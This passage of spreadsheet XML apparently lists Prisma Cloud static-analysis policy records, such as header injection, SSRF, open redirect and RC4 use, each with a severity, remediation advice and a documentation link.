          <t>The application was found calling `MimeMessage` methods without encoding new line characters. Much like HTTP, Simple Mail Transfer Protocol (SMTP) is a text based protocol that uses headers to convey additional directives for how email messages should be treated. To mitigate this issue, `\r\n` (CRLF) character sequences must be escaped or encoded prior to being used in any of the `MimeMessage` methods.</t>
        </is>
      </c>
      <c r="X452" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-121</t>
        </is>
      </c>
      <c r="Y452" t="inlineStr"/>
      <c r="Z452" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA452" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB452" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC452" t="inlineStr">
        <is>
          <t>CKV3_SAST_121</t>
        </is>
      </c>
      <c r="AD452" t="b">
        <v>1</v>
      </c>
      <c r="AE452" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF452" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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2" t="inlineStr">
        <is>
          <t>c5b0321c-fe2d-44fb-afe0-7ccbb42c8676</t>
        </is>
      </c>
      <c r="AI452" t="inlineStr"/>
      <c r="AJ452" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK452" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="453">
      <c r="A453" t="inlineStr"/>
      <c r="B453" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C453" s="2" t="inlineStr"/>
      <c r="D453" t="inlineStr"/>
      <c r="E453" t="inlineStr"/>
      <c r="F453" t="inlineStr"/>
      <c r="G453" t="b">
        <v>1</v>
      </c>
      <c r="H4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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J453" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K453" t="inlineStr">
        <is>
          <t>Unsanitized user input in script engine evaluation leading to potential code injection</t>
        </is>
      </c>
      <c r="L453" t="inlineStr"/>
      <c r="M453" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N453" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O453" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P453" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q453" t="inlineStr"/>
      <c r="R453" t="inlineStr"/>
      <c r="S453" t="inlineStr"/>
      <c r="T453" t="b">
        <v>0</v>
      </c>
      <c r="U453" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V453" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W453" t="inlineStr">
        <is>
          <t>Avoid using user input directly in ScriptEngine's eval, which may execute  OS commands. Prefer hardcoded JavaScript, lookup tables, or javax.script.Bindings  for safer input handling.</t>
        </is>
      </c>
      <c r="X453" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-113</t>
        </is>
      </c>
      <c r="Y453" t="inlineStr"/>
      <c r="Z453" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA453" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB453" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC453" t="inlineStr">
        <is>
          <t>CKV3_SAST_113</t>
        </is>
      </c>
      <c r="AD453" t="b">
        <v>1</v>
      </c>
      <c r="AE453" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF453" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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3" t="inlineStr">
        <is>
          <t>c562d002-41e7-4df1-b2ce-907c5e96ff6e</t>
        </is>
      </c>
      <c r="AI453" t="inlineStr"/>
      <c r="AJ453" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK453" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="454">
      <c r="A454" t="inlineStr"/>
      <c r="B454" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C454" s="2" t="inlineStr"/>
      <c r="D454" t="inlineStr"/>
      <c r="E454" t="inlineStr"/>
      <c r="F454" t="inlineStr"/>
      <c r="G454" t="b">
        <v>1</v>
      </c>
      <c r="H4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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J454" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K454" t="inlineStr">
        <is>
          <t>Insecure file permissions setting</t>
        </is>
      </c>
      <c r="L454" t="inlineStr"/>
      <c r="M454" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N454" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O454" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P454" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q454" t="inlineStr"/>
      <c r="R454" t="inlineStr"/>
      <c r="S454" t="inlineStr"/>
      <c r="T454" t="b">
        <v>0</v>
      </c>
      <c r="U454" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V454" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W454" t="inlineStr">
        <is>
          <t>The application was found setting file permissions to overly permissive values. Consider using the following values if the application user is the only process to access the file: - `r--` - read only access to the file - `w--` - write only access to the file - `rw-` - read/write access to the file</t>
        </is>
      </c>
      <c r="X454" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-134</t>
        </is>
      </c>
      <c r="Y454" t="inlineStr"/>
      <c r="Z454" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA454" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB454" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC454" t="inlineStr">
        <is>
          <t>CKV3_SAST_134</t>
        </is>
      </c>
      <c r="AD454" t="b">
        <v>1</v>
      </c>
      <c r="AE454" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF454" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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4" t="inlineStr">
        <is>
          <t>d4449e9a-21f7-4d61-9ce9-9ebc41822f06</t>
        </is>
      </c>
      <c r="AI454" t="inlineStr"/>
      <c r="AJ454" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK454" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="455">
      <c r="A455" t="inlineStr"/>
      <c r="B455" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C455" s="2" t="inlineStr"/>
      <c r="D455" t="inlineStr"/>
      <c r="E455" t="inlineStr"/>
      <c r="F455" t="inlineStr"/>
      <c r="G455" t="b">
        <v>1</v>
      </c>
      <c r="H4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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J455" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K455" t="inlineStr">
        <is>
          <t>The application builds a URL using user-controlled input which can lead to an open redirect vulnerability.</t>
        </is>
      </c>
      <c r="L455" t="inlineStr"/>
      <c r="M455" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N455" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O455" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P455" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q455" t="inlineStr"/>
      <c r="R455" t="inlineStr"/>
      <c r="S455" t="inlineStr"/>
      <c r="T455" t="b">
        <v>0</v>
      </c>
      <c r="U455" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V455" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W455" t="inlineStr">
        <is>
          <t>Make sure to sanitize the URL by input validation</t>
        </is>
      </c>
      <c r="X455" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/javascript-policies/sast-policy-191</t>
        </is>
      </c>
      <c r="Y455" t="inlineStr"/>
      <c r="Z455" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA455" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB455" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC455" t="inlineStr">
        <is>
          <t>CKV3_SAST_191</t>
        </is>
      </c>
      <c r="AD455" t="b">
        <v>1</v>
      </c>
      <c r="AE455" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF455" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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5" t="inlineStr">
        <is>
          <t>0abf4e5b-f8ab-48ac-9bf5-7c7f5cd0ec33</t>
        </is>
      </c>
      <c r="AI455" t="inlineStr"/>
      <c r="AJ455" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK455" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="456">
      <c r="A456" t="inlineStr"/>
      <c r="B456" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C456" s="2" t="inlineStr"/>
      <c r="D456" t="inlineStr"/>
      <c r="E456" t="inlineStr"/>
      <c r="F456" t="inlineStr"/>
      <c r="G456" t="b">
        <v>1</v>
      </c>
      <c r="H4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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J456" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K456" t="inlineStr">
        <is>
          <t>Improper Authorization in Handler for Custom URL Scheme</t>
        </is>
      </c>
      <c r="L456" t="inlineStr"/>
      <c r="M456" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N456" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O456" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P456" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q456" t="inlineStr"/>
      <c r="R456" t="inlineStr"/>
      <c r="S456" t="inlineStr"/>
      <c r="T456" t="b">
        <v>0</v>
      </c>
      <c r="U456" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V456" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W456" t="inlineStr">
        <is>
          <t>Detected a dynamic value being used with urllib. urllib supports `file://` schemes, so a dynamic value controlled by a malicious actor may allow them to read arbitrary files. Audit uses of urllib calls to ensure user data cannot control the URLs, or consider using the `requests` library instead.</t>
        </is>
      </c>
      <c r="X456" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/sast-policies/python-policies/sast-policy-70</t>
        </is>
      </c>
      <c r="Y456" t="inlineStr"/>
      <c r="Z456" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA456" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB456" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC456" t="inlineStr">
        <is>
          <t>CKV3_SAST_70</t>
        </is>
      </c>
      <c r="AD456" t="b">
        <v>1</v>
      </c>
      <c r="AE456" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF456" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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6" t="inlineStr">
        <is>
          <t>90996505-9a4c-4211-99a2-65756ab60b01</t>
        </is>
      </c>
      <c r="AI456" t="inlineStr"/>
      <c r="AJ456" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK456" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="457">
      <c r="A457" t="inlineStr"/>
      <c r="B457" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C457" s="2" t="inlineStr"/>
      <c r="D457" t="inlineStr"/>
      <c r="E457" t="inlineStr"/>
      <c r="F457" t="inlineStr"/>
      <c r="G457" t="b">
        <v>1</v>
      </c>
      <c r="H4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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J457" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K457" t="inlineStr">
        <is>
          <t>Server-side request forgery with Python web frameworks</t>
        </is>
      </c>
      <c r="L457" t="inlineStr"/>
      <c r="M457" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N457" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O457" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P457" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q457" t="inlineStr"/>
      <c r="R457" t="inlineStr"/>
      <c r="S457" t="inlineStr"/>
      <c r="T457" t="b">
        <v>0</v>
      </c>
      <c r="U457" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V457" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W457" t="inlineStr">
        <is>
          <t>ensure that schemes and hosts are validated against an allowlist, do not forward the response to the user, and ensure proper authentication and transport-layer security in the proxied request.</t>
        </is>
      </c>
      <c r="X457" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-189</t>
        </is>
      </c>
      <c r="Y457" t="inlineStr"/>
      <c r="Z457" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA457" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB457" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC457" t="inlineStr">
        <is>
          <t>CKV3_SAST_189</t>
        </is>
      </c>
      <c r="AD457" t="b">
        <v>1</v>
      </c>
      <c r="AE457" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF457" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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7" t="inlineStr">
        <is>
          <t>18458871-6cdd-4272-a139-58df4156a090</t>
        </is>
      </c>
      <c r="AI457" t="inlineStr"/>
      <c r="AJ457" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK457" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="458">
      <c r="A458" t="inlineStr"/>
      <c r="B458" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C458" s="2" t="inlineStr"/>
      <c r="D458" t="inlineStr"/>
      <c r="E458" t="inlineStr"/>
      <c r="F458" t="inlineStr"/>
      <c r="G458" t="b">
        <v>1</v>
      </c>
      <c r="H4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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J458" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K458" t="inlineStr">
        <is>
          <t>Usage of insecure RC4 cipher</t>
        </is>
      </c>
      <c r="L458" t="inlineStr"/>
      <c r="M458" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N458" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O458" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P458" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q458" t="inlineStr"/>
      <c r="R458" t="inlineStr"/>
      <c r="S458" t="inlineStr"/>
      <c r="T458" t="b">
        <v>0</v>
      </c>
      <c r="U458" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V458" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W458" t="inlineStr">
        <is>
          <t>This policy identifies the use of the outdated RC4 encryption protocol from the crypto/rc4 package in Go applications. RC4 is considered insecure and should be replaced with more secure encryption standards, such as AES.</t>
        </is>
      </c>
      <c r="X458" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/golang-policies/sast-policy-241</t>
        </is>
      </c>
      <c r="Y458" t="inlineStr"/>
      <c r="Z458" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA458" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB458" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC458" t="inlineStr">
        <is>
          <t>CKV3_SAST_241</t>
        </is>
      </c>
      <c r="AD458" t="b">
        <v>1</v>
      </c>
      <c r="AE458" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF458" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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8" t="inlineStr">
        <is>
          <t>65ada956-a0eb-4ad8-bdab-1d471e9fdd4d</t>
        </is>
      </c>
      <c r="AI458" t="inlineStr"/>
      <c r="AJ458" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK458" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="459">
      <c r="A459" t="inlineStr"/>
      <c r="B459" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C459" s="2" t="inlineStr"/>
      <c r="D459" t="inlineStr"/>
      <c r="E459" t="inlineStr"/>
      <c r="F459" t="inlineStr"/>
      <c r="G459" t="b">
        <v>1</v>
      </c>
      <c r="H4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59" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J459" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K459" t="inlineStr">
        <is>
          <t>External control of system or configuration setting</t>
        </is>
      </c>
      <c r="L459" t="inlineStr"/>
      <c r="M459" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N459" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O459" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P459" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q459" t="inlineStr"/>
      <c r="R459" t="inlineStr"/>
      <c r="S459" t="inlineStr"/>
      <c r="T459" t="b">
        <v>0</v>
      </c>
      <c r="U459" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V459" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W459" t="inlineStr">
        <is>
          <t>Ensure user input isn't used in java.sql.Connection's setCatalog call. This might let attackers change the database during a connection, causing disruptions or unexpected behaviors.</t>
        </is>
      </c>
      <c r="X459" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-108</t>
        </is>
      </c>
      <c r="Y459" t="inlineStr"/>
      <c r="Z459" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA459" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB459" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC459" t="inlineStr">
        <is>
          <t>CKV3_SAST_108</t>
        </is>
      </c>
      <c r="AD459" t="b">
        <v>1</v>
      </c>
      <c r="AE459" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF459" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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59" t="inlineStr">
        <is>
          <t>dbc76faa-c1b4-453c-b5f2-fcd37ba94c9c</t>
        </is>
      </c>
      <c r="AI459" t="inlineStr"/>
      <c r="AJ459" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK459" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="460">
      <c r="A460" t="inlineStr"/>
      <c r="B460" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C460" s="2" t="inlineStr"/>
      <c r="D460" t="inlineStr"/>
      <c r="E460" t="inlineStr"/>
      <c r="F460" t="inlineStr"/>
      <c r="G460" t="b">
        <v>1</v>
      </c>
      <c r="H4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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J460" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K460" t="inlineStr">
        <is>
          <t>Improper logger configuration</t>
        </is>
      </c>
      <c r="L460" t="inlineStr"/>
      <c r="M460" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N460" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O460" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P460" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q460" t="inlineStr"/>
      <c r="R460" t="inlineStr"/>
      <c r="S460" t="inlineStr"/>
      <c r="T460" t="b">
        <v>0</v>
      </c>
      <c r="U460" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V460" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W460" t="inlineStr">
        <is>
          <t>Configuring loggers is security-sensitive.</t>
        </is>
      </c>
      <c r="X460" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-57</t>
        </is>
      </c>
      <c r="Y460" t="inlineStr"/>
      <c r="Z460" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA460" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB460" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC460" t="inlineStr">
        <is>
          <t>CKV3_SAST_57</t>
        </is>
      </c>
      <c r="AD460" t="b">
        <v>1</v>
      </c>
      <c r="AE460" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF460" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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0" t="inlineStr">
        <is>
          <t>dea8b4c8-bf5b-4d0a-977b-66c5058526e5</t>
        </is>
      </c>
      <c r="AI460" t="inlineStr"/>
      <c r="AJ460" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK460" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="461">
      <c r="A461" t="inlineStr"/>
      <c r="B461" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C461" s="2" t="inlineStr"/>
      <c r="D461" t="inlineStr"/>
      <c r="E461" t="inlineStr"/>
      <c r="F461" t="inlineStr"/>
      <c r="G461" t="b">
        <v>1</v>
      </c>
      <c r="H4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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J461" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K461" t="inlineStr">
        <is>
          <t>Improper Access Control</t>
        </is>
      </c>
      <c r="L461" t="inlineStr"/>
      <c r="M461" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N461" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O461" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P461" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q461" t="inlineStr"/>
      <c r="R461" t="inlineStr"/>
      <c r="S461" t="inlineStr"/>
      <c r="T461" t="b">
        <v>0</v>
      </c>
      <c r="U461" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V461" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W461" t="inlineStr">
        <is>
          <t>Consider possible security implications associated with httpoxy module.</t>
        </is>
      </c>
      <c r="X461" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-97</t>
        </is>
      </c>
      <c r="Y461" t="inlineStr"/>
      <c r="Z461" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA461" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB461" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC461" t="inlineStr">
        <is>
          <t>CKV3_SAST_97</t>
        </is>
      </c>
      <c r="AD461" t="b">
        <v>1</v>
      </c>
      <c r="AE461" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF461" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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1" t="inlineStr">
        <is>
          <t>7498a565-2b24-420e-a2c8-8b2c38f5fc95</t>
        </is>
      </c>
      <c r="AI461" t="inlineStr"/>
      <c r="AJ461" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK461" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="462">
      <c r="A462" t="inlineStr"/>
      <c r="B462" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C462" s="2" t="inlineStr"/>
      <c r="D462" t="inlineStr"/>
      <c r="E462" t="inlineStr"/>
      <c r="F462" t="inlineStr"/>
      <c r="G462" t="b">
        <v>1</v>
      </c>
      <c r="H4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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J462" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K462" t="inlineStr">
        <is>
          <t>Improper handling of checking for unusual or exceptional conditions</t>
        </is>
      </c>
      <c r="L462" t="inlineStr"/>
      <c r="M462" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N462" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O462" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P462" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q462" t="inlineStr"/>
      <c r="R462" t="inlineStr"/>
      <c r="S462" t="inlineStr"/>
      <c r="T462" t="b">
        <v>0</v>
      </c>
      <c r="U462" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V462" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W462" t="inlineStr">
        <is>
          <t>Use of assert detected. The enclosed code will be removed when compiling to optimized byte code.</t>
        </is>
      </c>
      <c r="X462" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-4</t>
        </is>
      </c>
      <c r="Y462" t="inlineStr"/>
      <c r="Z462" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA462" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB462" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC462" t="inlineStr">
        <is>
          <t>CKV3_SAST_4</t>
        </is>
      </c>
      <c r="AD462" t="b">
        <v>1</v>
      </c>
      <c r="AE462" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF462" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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2" t="inlineStr">
        <is>
          <t>5965c78f-4573-4836-8a7c-e2b81eb730de</t>
        </is>
      </c>
